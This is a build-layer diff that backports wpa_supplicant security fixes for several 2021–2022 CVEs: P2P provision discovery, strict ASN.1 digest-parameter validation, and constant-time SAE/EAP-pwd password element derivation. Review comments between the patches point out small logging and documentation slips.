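+Upstream-Status: Backport
+CVE: CVE-2021-27803
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=8460e3230988ef2ec13ce6b69b687e941f6cdb32]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p_pd.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/src/p2p/p2p_pd.c b/src/p2p/p2p_pd.c
+index 3994ec0..05fd593 100644
+--- a/src/p2p/p2p_pd.c
++++ b/src/p2p/p2p_pd.c
+@@ -595,14 +595,12 @@ void p2p_process_prov_disc_req(struct p2p_data *p2p, const u8 *sa,
+ goto out;
+ }
+
++ dev = p2p_get_device(p2p, sa);
+ if (!dev) {
+- dev = p2p_get_device(p2p, sa);
+- if (!dev) {
+- p2p_dbg(p2p,
+- "Provision Discovery device not found "
+- MACSTR, MAC2STR(sa));
+- goto out;
+- }
++ p2p_dbg(p2p,
++ "Provision Discovery device not found "
++ MACSTR, MAC2STR(sa));
++ goto out;
+ }
+ } else if (msg.wfd_subelems) {
+ wpabuf_free(dev->info.wfd_subelems);
+--
+2.17.1
+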
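--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
@@ -0,0 +1,123 @@
+From a0541334a6394f8237a4393b7372693cd7e96f15 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Sat, 13 Mar 2021 18:19:31 +0200
+Subject: [PATCH] ASN.1: Validate DigestAlgorithmIdentifier parameters
+
+The supported hash algorithms do not use AlgorithmIdentifier parameters.
+However, there are implementations that include NULL parameters in
+addition to ones that omit the parameters. Previous implementation did
+not check the parameters value at all which supported both these cases,
+but did not reject any other unexpected information.
+
+Use strict validation of digest algorithm parameters and reject any
+unexpected value when validating a signature. This is needed to prevent
+potential forging attacks.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+
+Upstream-Status: Backport
+CVE: CVE-2021-30004
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=a0541334a6394f8237a4393b7372693cd7e96f15]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/tls/pkcs1.c | 21 +++++++++++++++++++++
+ src/tls/x509v3.c | 20 ++++++++++++++++++++
+ 2 files changed, 41 insertions(+)
+
+diff --git a/src/tls/pkcs1.c b/src/tls/pkcs1.c
+index 141ac50..e09db07 100644
+--- a/src/tls/pkcs1.c
++++ b/src/tls/pkcs1.c
+@@ -240,6 +240,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestInfo",
++ hdr.payload, hdr.length);
+
+ pos = hdr.payload;
+ end = pos + hdr.length;
+@@ -261,6 +263,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestAlgorithmIdentifier",
++ hdr.payload, hdr.length);
+ da_end = hdr.payload + hdr.length;
+
+ if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -269,6 +273,23 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: Digest algorithm parameters",
++ next, da_end - next);
++
++ /*
++ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++ * omit the parameters, but there are implementation that encode these
++ * as a NULL element. Allow these two cases and reject anything else.
++ */
++ if (da_end > next &&
++ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++ !asn1_is_null(&hdr) ||
++ hdr.payload + hdr.length != da_end)) {
++ wpa_printf(MSG_DEBUG,
++ "PKCS #1: Unexpected digest algorithm parameters");
++ os_free(decrypted);
++ return -1;
++ }
+
+ if (!asn1_oid_equal(&oid, hash_alg)) {
+ char txt[100], txt2[100];
+diff --git a/src/tls/x509v3.c b/src/tls/x509v3.c
+index 1bd5aa0..bf2289f 100644
+--- a/src/tls/x509v3.c
++++ b/src/tls/x509v3.c
+@@ -1834,6 +1834,7 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: DigestInfo", hdr.payload, hdr.length);
+
+ pos = hdr.payload;
+ end = pos + hdr.length;
+@@ -1855,6 +1856,8 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: DigestAlgorithmIdentifier",
++ hdr.payload, hdr.length);
+ da_end = hdr.payload + hdr.length;
+
+ if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -1862,6 +1865,23 @@ int x509_check_signature(struct x509_certificate *issuer,
+ os_free(data);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "X509: Digest algorithm parameters",
++ next, da_end - next);
++
++ /*
++ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++ * omit the parameters, but there are implementation that encode these
++ * as a NULL element. Allow these two cases and reject anything else.
++ */
++ if (da_end > next &&
++ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++ !asn1_is_null(&hdr) ||
++ hdr.payload + hdr.length != da_end)) {
++ wpa_printf(MSG_DEBUG,
++ "X509: Unexpected digest algorithm parameters");
++ os_free(data);
++ return -1;
++ }
+
+ if (x509_sha1_oid(&oid)) {
+ if (signature->oid.oid[6] != 5 /* sha-1WithRSAEncryption */) {
+--
+2.17.1
+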
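Review bot: The comment added above the new parameter check in both `pkcs1_v15_sig_ver()` and `x509_check_signature()` cites RFC 5754 and the SHA2 algorithms, but the check runs before the OID is compared, so it governs every digest algorithm these paths accept (the x509v3.c hunk runs straight into `x509_sha1_oid()`). I would word it as `/* DigestAlgorithmIdentifier parameters must be absent or a single NULL element, for every hash algorithm; reject anything else. */` so a later reader does not relax it for non-SHA2 OIDs. The same block is added verbatim to both files; a shared helper would keep the two verifiers from drifting, although staying identical to upstream is a fair reason not to do that in a backport. Both functions start and end outside the hunks shown.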
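--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch
@@ -0,0 +1,609 @@
+From 208e5687ff2e48622e28d8888ce5444a54353bbd Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 27 Aug 2019 16:33:15 +0300
+Subject: [PATCH 1/4] crypto: Add more bignum/EC helper functions
+
+These are needed for implementing SAE hash-to-element.
+
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
+Upstream-Status: Backport
+https://w1.fi/security/2022-1/
+
+CVE: CVE-2022-23303 CVE-2022-23304
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/crypto/crypto.h | 45 ++++++++++++++++++
+ src/crypto/crypto_openssl.c | 94 +++++++++++++++++++++++++++++++++++++
+ src/crypto/crypto_wolfssl.c | 66 ++++++++++++++++++++++++++
+ 3 files changed, 205 insertions(+)
+
+diff --git a/src/crypto/crypto.h b/src/crypto/crypto.h
+index 15f8ad04cea4..68476dbce96c 100644
+--- a/src/crypto/crypto.h
++++ b/src/crypto/crypto.h
+@@ -518,6 +518,13 @@ struct crypto_bignum * crypto_bignum_init(void);
+ */
+ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len);
+
++/**
++ * crypto_bignum_init_set - Allocate memory for bignum and set the value (uint)
++ * @val: Value to set
++ * Returns: Pointer to allocated bignum or %NULL on failure
++ */
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val);
++
+ /**
+ * crypto_bignum_deinit - Free bignum
+ * @n: Bignum from crypto_bignum_init() or crypto_bignum_init_set()
+@@ -612,6 +619,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ struct crypto_bignum *c);
+
++/**
++ * crypto_bignum_addmod - d = a + b (mod c)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum
++ * @d: Bignum; used to store the result of (a + b) % c
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d);
++
+ /**
+ * crypto_bignum_mulmod - d = a * b (mod c)
+ * @a: Bignum
+@@ -625,6 +645,28 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *c,
+ struct crypto_bignum *d);
+
++/**
++ * crypto_bignum_sqrmod - c = a^2 (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result of a^2 % b
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c);
++
++/**
++ * crypto_bignum_sqrtmod - returns sqrt(a) (mod b)
++ * @a: Bignum
++ * @b: Bignum
++ * @c: Bignum; used to store the result
++ * Returns: 0 on success, -1 on failure
++ */
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c);
++
+ /**
+ * crypto_bignum_rshift - r = a >> n
+ * @a: Bignum
+@@ -731,6 +773,9 @@ const struct crypto_bignum * crypto_ec_get_prime(struct crypto_ec *e);
+ */
+ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e);
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e);
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e);
++
+ /**
+ * struct crypto_ec_point - Elliptic curve point
+ *
+diff --git a/src/crypto/crypto_openssl.c b/src/crypto/crypto_openssl.c
+index bab33a537293..ed463105e8f1 100644
+--- a/src/crypto/crypto_openssl.c
++++ b/src/crypto/crypto_openssl.c
+@@ -1283,6 +1283,24 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+
+
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++ BIGNUM *bn;
++
++ if (TEST_FAIL())
++ return NULL;
++
++ bn = BN_new();
++ if (!bn)
++ return NULL;
++ if (BN_set_word(bn, val) != 1) {
++ BN_free(bn);
++ return NULL;
++ }
++ return (struct crypto_bignum *) bn;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ if (clear)
+@@ -1449,6 +1467,28 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d)
++{
++ int res;
++ BN_CTX *bnctx;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_add((BIGNUM *) d, (const BIGNUM *) a, (const BIGNUM *) b,
++ (const BIGNUM *) c, bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ const struct crypto_bignum *c,
+@@ -1472,6 +1512,48 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ int res;
++ BN_CTX *bnctx;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_sqr((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++ bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ BN_CTX *bnctx;
++ BIGNUM *res;
++
++ if (TEST_FAIL())
++ return -1;
++
++ bnctx = BN_CTX_new();
++ if (!bnctx)
++ return -1;
++ res = BN_mod_sqrt((BIGNUM *) c, (const BIGNUM *) a, (const BIGNUM *) b,
++ bnctx);
++ BN_CTX_free(bnctx);
++
++ return res ? 0 : -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ struct crypto_bignum *r)
+ {
+@@ -1682,6 +1764,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ if (clear)
+diff --git a/src/crypto/crypto_wolfssl.c b/src/crypto/crypto_wolfssl.c
+index 4cedab4367cd..e9894b335e53 100644
+--- a/src/crypto/crypto_wolfssl.c
++++ b/src/crypto/crypto_wolfssl.c
+@@ -1042,6 +1042,26 @@ struct crypto_bignum * crypto_bignum_init_set(const u8 *buf, size_t len)
+ }
+
+
++struct crypto_bignum * crypto_bignum_init_uint(unsigned int val)
++{
++ mp_int *a;
++
++ if (TEST_FAIL())
++ return NULL;
++
++ a = (mp_int *) crypto_bignum_init();
++ if (!a)
++ return NULL;
++
++ if (mp_set_int(a, val) != MP_OKAY) {
++ os_free(a);
++ a = NULL;
++ }
++
++ return (struct crypto_bignum *) a;
++}
++
++
+ void crypto_bignum_deinit(struct crypto_bignum *n, int clear)
+ {
+ if (!n)
+@@ -1168,6 +1188,19 @@ int crypto_bignum_div(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_addmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ const struct crypto_bignum *c,
++ struct crypto_bignum *d)
++{
++ if (TEST_FAIL())
++ return -1;
++
++ return mp_addmod((mp_int *) a, (mp_int *) b, (mp_int *) c,
++ (mp_int *) d) == MP_OKAY ? 0 : -1;
++}
++
++
+ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ const struct crypto_bignum *b,
+ const struct crypto_bignum *m,
+@@ -1181,6 +1214,27 @@ int crypto_bignum_mulmod(const struct crypto_bignum *a,
+ }
+
+
++int crypto_bignum_sqrmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ if (TEST_FAIL())
++ return -1;
++
++ return mp_sqrmod((mp_int *) a, (mp_int *) b,
++ (mp_int *) c) == MP_OKAY ? 0 : -1;
++}
++
++
++int crypto_bignum_sqrtmod(const struct crypto_bignum *a,
++ const struct crypto_bignum *b,
++ struct crypto_bignum *c)
++{
++ /* TODO */
++ return -1;
++}
++
++
+ int crypto_bignum_rshift(const struct crypto_bignum *a, int n,
+ struct crypto_bignum *r)
+ {
+@@ -1386,6 +1440,18 @@ const struct crypto_bignum * crypto_ec_get_order(struct crypto_ec *e)
+ }
+
+
++const struct crypto_bignum * crypto_ec_get_a(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) &e->a;
++}
++
++
++const struct crypto_bignum * crypto_ec_get_b(struct crypto_ec *e)
++{
++ return (const struct crypto_bignum *) &e->b;
++}
++
++
+ void crypto_ec_point_deinit(struct crypto_ec_point *p, int clear)
+ {
+ ecc_point *point = (ecc_point *) p;
+--
+2.25.1
+
+From 2232d3d5f188b65dbb6c823ac62175412739eb16 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 2/4] dragonfly: Add sqrt() helper function
+
+This is a backport of "SAE: Move sqrt() implementation into a helper
+function" to introduce the helper function needed for the following
+patches.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/dragonfly.c | 34 ++++++++++++++++++++++++++++++++++
+ src/common/dragonfly.h | 2 ++
+ 2 files changed, 36 insertions(+)
+
+diff --git a/src/common/dragonfly.c b/src/common/dragonfly.c
+index 547be66f1561..1e842716668e 100644
+--- a/src/common/dragonfly.c
++++ b/src/common/dragonfly.c
+@@ -213,3 +213,37 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ "dragonfly: Unable to get randomness for own scalar");
+ return -1;
+ }
++
++
++/* res = sqrt(val) */
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++ struct crypto_bignum *res)
++{
++ const struct crypto_bignum *prime;
++ struct crypto_bignum *tmp, *one;
++ int ret = 0;
++ u8 prime_bin[DRAGONFLY_MAX_ECC_PRIME_LEN];
++ size_t prime_len;
++
++ /* For prime p such that p = 3 mod 4, sqrt(w) = w^((p+1)/4) mod p */
++
++ prime = crypto_ec_get_prime(ec);
++ prime_len = crypto_ec_prime_len(ec);
++ tmp = crypto_bignum_init();
++ one = crypto_bignum_init_uint(1);
++
++ if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
++ prime_len) < 0 ||
++ (prime_bin[prime_len - 1] & 0x03) != 3 ||
++ !tmp || !one ||
++ /* tmp = (p+1)/4 */
++ crypto_bignum_add(prime, one, tmp) < 0 ||
++ crypto_bignum_rshift(tmp, 2, tmp) < 0 ||
++ /* res = sqrt(val) */
++ crypto_bignum_exptmod(val, tmp, prime, res) < 0)
++ ret = -1;
++
++ crypto_bignum_deinit(tmp, 0);
++ crypto_bignum_deinit(one, 0);
++ return ret;
++}
+diff --git a/src/common/dragonfly.h b/src/common/dragonfly.h
+index ec3dd593eda4..84d67f575c54 100644
+--- a/src/common/dragonfly.h
++++ b/src/common/dragonfly.h
+@@ -27,5 +27,7 @@ int dragonfly_generate_scalar(const struct crypto_bignum *order,
+ struct crypto_bignum *_rand,
+ struct crypto_bignum *_mask,
+ struct crypto_bignum *scalar);
++int dragonfly_sqrt(struct crypto_ec *ec, const struct crypto_bignum *val,
++ struct crypto_bignum *res);
+
+ #endif /* DRAGONFLY_H */
+--
+2.25.1
+
+From fe534b0baaa8c0e6ddeb24cf529d6e50e33dc501 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 13:47:16 +0200
+Subject: [PATCH 3/4] SAE: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/common/sae.c | 47 +++++++++++++++++++++++++++++++++--------------
+ 1 file changed, 33 insertions(+), 14 deletions(-)
+
+diff --git a/src/common/sae.c b/src/common/sae.c
+index 08fdbfd18173..8d79ed962768 100644
+--- a/src/common/sae.c
++++ b/src/common/sae.c
+@@ -286,14 +286,16 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ int pwd_seed_odd = 0;
+ u8 prime[SAE_MAX_ECC_PRIME_LEN];
+ size_t prime_len;
+- struct crypto_bignum *x = NULL, *qr = NULL, *qnr = NULL;
++ struct crypto_bignum *x = NULL, *y = NULL, *qr = NULL, *qnr = NULL;
+ u8 x_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 x_cand_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 qr_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 qnr_bin[SAE_MAX_ECC_PRIME_LEN];
++ u8 x_y[2 * SAE_MAX_ECC_PRIME_LEN];
+ int res = -1;
+ u8 found = 0; /* 0 (false) or 0xff (true) to be used as const_time_*
+ * mask */
++ unsigned int is_eq;
+
+ os_memset(x_bin, 0, sizeof(x_bin));
+
+@@ -402,25 +404,42 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ goto fail;
+ }
+
+- if (!sae->tmp->pwe_ecc)
+- sae->tmp->pwe_ecc = crypto_ec_point_init(sae->tmp->ec);
+- if (!sae->tmp->pwe_ecc)
+- res = -1;
+- else
+- res = crypto_ec_point_solve_y_coord(sae->tmp->ec,
+- sae->tmp->pwe_ecc, x,
+- pwd_seed_odd);
+- if (res < 0) {
+- /*
+- * This should not happen since we already checked that there
+- * is a result.
+- */
++ /* y = sqrt(x^3 + ax + b) mod p
++ * if LSB(save) == LSB(y): PWE = (x, y)
++ * else: PWE = (x, p - y)
++ *
++ * Calculate y and the two possible values for PWE and after that,
++ * use constant time selection to copy the correct alternative.
++ */
++ y = crypto_ec_point_compute_y_sqr(sae->tmp->ec, x);
++ if (!y ||
++ dragonfly_sqrt(sae->tmp->ec, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y, SAE_MAX_ECC_PRIME_LEN,
++ prime_len) < 0 ||
++ crypto_bignum_sub(sae->tmp->prime, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y + SAE_MAX_ECC_PRIME_LEN,
++ SAE_MAX_ECC_PRIME_LEN, prime_len) < 0) {
+ wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++ goto fail;
++ }
++
++ is_eq = const_time_eq(pwd_seed_odd, x_y[prime_len - 1] & 0x01);
++ const_time_select_bin(is_eq, x_y, x_y + SAE_MAX_ECC_PRIME_LEN,
++ prime_len, x_y + prime_len);
++ os_memcpy(x_y, x_bin, prime_len);
++ wpa_hexdump_key(MSG_DEBUG, "SAE: PWE", x_y, 2 * prime_len);
++ crypto_ec_point_deinit(sae->tmp->pwe_ecc, 1);
++ sae->tmp->pwe_ecc = crypto_ec_point_from_bin(sae->tmp->ec, x_y);
++ if (!sae->tmp->pwe_ecc) {
++ wpa_printf(MSG_DEBUG, "SAE: Could not generate PWE");
++ res = -1;
+ }
+
+ fail:
++ forced_memzero(x_y, sizeof(x_y));
+ crypto_bignum_deinit(qr, 0);
+ crypto_bignum_deinit(qnr, 0);
++ crypto_bignum_deinit(y, 1);
+ os_free(dummy_password);
+ bin_clear_free(tmp_password, password_len);
+ crypto_bignum_deinit(x, 1);
+--
+2.25.1
+
+From 603cd880e7f90595482658a7136fa6a7be5cb485 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 18:52:27 +0200
+Subject: [PATCH 4/4] EAP-pwd: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/eap_common/eap_pwd_common.c | 46 ++++++++++++++++++++++++++-------
+ 1 file changed, 36 insertions(+), 10 deletions(-)
+
+diff --git a/src/eap_common/eap_pwd_common.c b/src/eap_common/eap_pwd_common.c
+index 2b2b8efdbd01..ff22b29b087a 100644
+--- a/src/eap_common/eap_pwd_common.c
++++ b/src/eap_common/eap_pwd_common.c
+@@ -127,7 +127,8 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ u8 qr_or_qnr_bin[MAX_ECC_PRIME_LEN];
+ u8 x_bin[MAX_ECC_PRIME_LEN];
+ u8 prime_bin[MAX_ECC_PRIME_LEN];
+- struct crypto_bignum *tmp2 = NULL;
++ u8 x_y[2 * MAX_ECC_PRIME_LEN];
++ struct crypto_bignum *tmp2 = NULL, *y = NULL;
+ struct crypto_hash *hash;
+ unsigned char pwe_digest[SHA256_MAC_LEN], *prfbuf = NULL, ctr;
+ int ret = 0, res;
+@@ -139,6 +140,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ u8 found_ctr = 0, is_odd = 0;
+ int cmp_prime;
+ unsigned int in_range;
++ unsigned int is_eq;
+
+ if (grp->pwe)
+ return -1;
+@@ -151,11 +153,6 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
+ primebytelen) < 0)
+ return -1;
+- grp->pwe = crypto_ec_point_init(grp->group);
+- if (!grp->pwe) {
+- wpa_printf(MSG_INFO, "EAP-pwd: unable to create bignums");
+- goto fail;
+- }
+
+ if ((prfbuf = os_malloc(primebytelen)) == NULL) {
+ wpa_printf(MSG_INFO, "EAP-pwd: unable to malloc space for prf "
+@@ -261,10 +258,37 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ */
+ crypto_bignum_deinit(x_candidate, 1);
+ x_candidate = crypto_bignum_init_set(x_bin, primebytelen);
+- if (!x_candidate ||
+- crypto_ec_point_solve_y_coord(grp->group, grp->pwe, x_candidate,
+- is_odd) != 0) {
+- wpa_printf(MSG_INFO, "EAP-pwd: Could not solve for y");
++ if (!x_candidate)
++ goto fail;
++
++ /* y = sqrt(x^3 + ax + b) mod p
++ * if LSB(y) == LSB(pwd-seed): PWE = (x, y)
++ * else: PWE = (x, p - y)
++ *
++ * Calculate y and the two possible values for PWE and after that,
++ * use constant time selection to copy the correct alternative.
++ */
++ y = crypto_ec_point_compute_y_sqr(grp->group, x_candidate);
++ if (!y ||
++ dragonfly_sqrt(grp->group, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y, MAX_ECC_PRIME_LEN, primebytelen) < 0 ||
++ crypto_bignum_sub(prime, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y + MAX_ECC_PRIME_LEN,
++ MAX_ECC_PRIME_LEN, primebytelen) < 0) {
++ wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++ goto fail;
++ }
++
++ /* Constant time selection of the y coordinate from the two
++ * options */
++ is_eq = const_time_eq(is_odd, x_y[primebytelen - 1] & 0x01);
++ const_time_select_bin(is_eq, x_y, x_y + MAX_ECC_PRIME_LEN,
++ primebytelen, x_y + primebytelen);
++ os_memcpy(x_y, x_bin, primebytelen);
++ wpa_hexdump_key(MSG_DEBUG, "EAP-pwd: PWE", x_y, 2 * primebytelen);
++ grp->pwe = crypto_ec_point_from_bin(grp->group, x_y);
++ if (!grp->pwe) {
++ wpa_printf(MSG_DEBUG, "EAP-pwd: Could not generate PWE");
+ goto fail;
+ }
+
+@@ -289,6 +313,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ /* cleanliness and order.... */
+ crypto_bignum_deinit(x_candidate, 1);
+ crypto_bignum_deinit(tmp2, 1);
++ crypto_bignum_deinit(y, 1);
+ crypto_bignum_deinit(qr, 1);
+ crypto_bignum_deinit(qnr, 1);
+ bin_clear_free(prfbuf, primebytelen);
+@@ -296,6 +321,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ os_memset(qnr_bin, 0, sizeof(qnr_bin));
+ os_memset(qr_or_qnr_bin, 0, sizeof(qr_or_qnr_bin));
+ os_memset(pwe_digest, 0, sizeof(pwe_digest));
++ forced_memzero(x_y, sizeof(x_y));
+
+ return ret;
+ }
+--
+2.25.1
+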
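Review bot: In the `compute_password_element()` hunk of patch 4/4 the new failure path logs `"SAE: Could not solve y"` although this is EAP-pwd code, so anyone triaging logs would attribute the failure to the wrong protocol; the neighbouring messages use the `EAP-pwd:` prefix, so it should read `wpa_printf(MSG_DEBUG, "EAP-pwd: Could not solve for y");`. In patch 1/4 the crypto.h doc comment for `crypto_bignum_init_uint()` is still titled `crypto_bignum_init_set`, and the wolfSSL `crypto_bignum_sqrtmod()` is a `/* TODO */` stub that always returns -1; nothing in this series calls it (`dragonfly_sqrt()` goes through `crypto_bignum_exptmod()`), but a comment saying so would stop a later caller from relying on it. The side-channel fix also depends on the bignum primitives used here being constant time in the selected crypto backend, which these hunks do not show. The functions patched in 3/4 and 4/4 start and end outside the hunks.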
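--- a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Client for Wi-Fi Protected Access (WPA)"
 HOMEPAGE = "http://w1.fi/wpa_supplicant/"
+DESCRIPTION = "wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver."
 BUGTRACKER = "http://w1.fi/security/"
 SECTION = "network"
 LICENSE = "BSD-3-Clause"
@@ -29,6 +30,10 @@ SRC_URI = "http://w1.fi/releases/wpa_supplicant-${PV}.tar.gz \
  file://0001-WPS-UPnP-Do-not-allow-event-subscriptions-with-URLs-.patch \
  file://0002-WPS-UPnP-Fix-event-message-generation-using-a-long-U.patch \
  file://0003-WPS-UPnP-Handle-HTTP-initiation-failures-for-events-.patch \
+ file://CVE-2021-0326.patch \
+ file://CVE-2021-27803.patch \
+ file://CVE-2021-30004.patch \
+ file://CVE-2022-23303-4.patch \
  "
 SRC_URI[md5sum] = "2d2958c782576dc9901092fbfecb4190"
 SRC_URI[sha256sum] = "fcbdee7b4a64bea8177973299c8c824419c413ec2e3a95db63dd6a5dc3541f17"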
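--- a/meta/recipes-core/base-files/base-files/hosts
+++ b/meta/recipes-core/base-files/base-files/hosts
@@ -1,4 +1,4 @@
-127.0.0.1 localhost.localdomain localhost
+127.0.0.1 localhost
 
 # The following lines are desirable for IPv6 capable hosts
 ::1 localhost ip6-localhost ip6-loopback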
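--- a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
+++ b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Base system master password/group files"
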